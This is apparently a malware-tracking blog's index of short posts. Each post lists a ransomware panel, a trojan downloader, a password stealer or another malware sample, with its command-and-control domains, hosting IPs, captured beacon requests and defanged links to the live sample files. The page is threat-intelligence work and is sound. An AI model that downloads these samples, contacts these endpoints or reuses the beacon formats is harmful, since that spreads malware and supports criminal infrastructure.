qbstdn6k7iivyki2.onion(Lending Ransomware Hosted In France Roubaix Ovh Sas)

Uncategorized

The Ransomware is hosted with Tor. Domain                                   Address                Country qbstdn6k7iivyki2.onion.direct 5.135.181.100 France HTTP Requests : 5.135.181.100:80 (qbstdn6k7iivyki2.onion.direct) GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2 GET /lending/bot.php?name=4m4qn8F4804DA9-83EC&kod=tFpJtvsF^lUPeqDDzAQnkOeFfH]zSstunSA[dotBceHrJvZpTz&pid=2 HTTP/1.1 Host: qbstdn6k7iivyki2.onion.direct Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; Synapse)Read more...

Trojan Downloader Hosted In 66 Diferent ip’s

Uncategorized

This sample contains a trojan downloader : hxxp://193.28.179.40/loader/harsh02.exe around 1mb size. Hosts List : 94.153.127.132 41.38.71.138 94.254.52.140 46.149.62.141 123.28.95.142 134.17.160.109 178.129.117.110 85.17.31.111 91.246.240.111 5.105.31.117 77.123.167.4 95.65.55.6 178.151.65.6 176.116.194.6 82.211.132.7 180.176.214.13 46.118.178.14 95.76.169.18 5.105.39.19 176.37.119.19 211.120.158.247 46.118.63.248 91.123.153.248 213.111.223.250 27.2.103.254 106.242.117.85 5.105.56.87 117.40.213.89 77.122.167.93 81.198.206.95 173.240.15.54 46.119.56.56 145.249.166.60 77.121.186.60 89.43.129.64 78.139.185.21 176.8.198.22 89.41.38.24 73.38.63.24 182.234.149.25 91.209.96.3 93.79.182.11Read more...

indianmoneybag.in(HTTP Password Stealer Hosted In United States Provo Unified Layer)

Uncategorized

Mybe Zeus variant. Domains : repository.certum.pl 213.222.201.175 www.download.windowsupdate.com 184.25.56.173 crl.certum.pl 213.222.201.210 myworkmustpayme.xyz 162.144.218.223 www.indianmoneybag.in 104.153.45.242 joemb009i.xyz 162.144.218.223 cryfreeman042.ddns.net 41.138.167.135 HTTP Requests : http://www.indianmoneybag.in/wp-content/themes/twentyfourteen/css/php/gate.php POST /wp-content/themes/twentyfourteen/css/php/gate.php HTTP/1.0 Host: www.indianmoneybag.in Accept: */* Accept-Encoding: identity, *;q=0 Content-Length: 506 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) http://myworkmustpayme.xyz/wp-admin/css/panel/config.jpg GET /wp-admin/css/panel/config.jpg HTTP/1.1 Accept: */* Connection:Read more...

pltd.myjino.ru(HTTP Malware Hosted In Russian Federation Moscow Avguro Technologies Ltd. Hosting Service Provider)

Uncategorized

Domain Name : pltd.myjino.ru 81.177.140.144 HTTP Requests : http://pltd.myjino.ru/finsess.php Data : POST /finsess.php HTTP/1.0 Host: pltd.myjino.ru Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Content-Type: application/x-www-form-urlencoded Content-Length: 26 1=1882869218&2=&3=&99=15&^ Get sample here : hxxp://93.95.99.172/0310_crypted.exe Hosting infos : http://whois.domaintools.com/81.177.140.144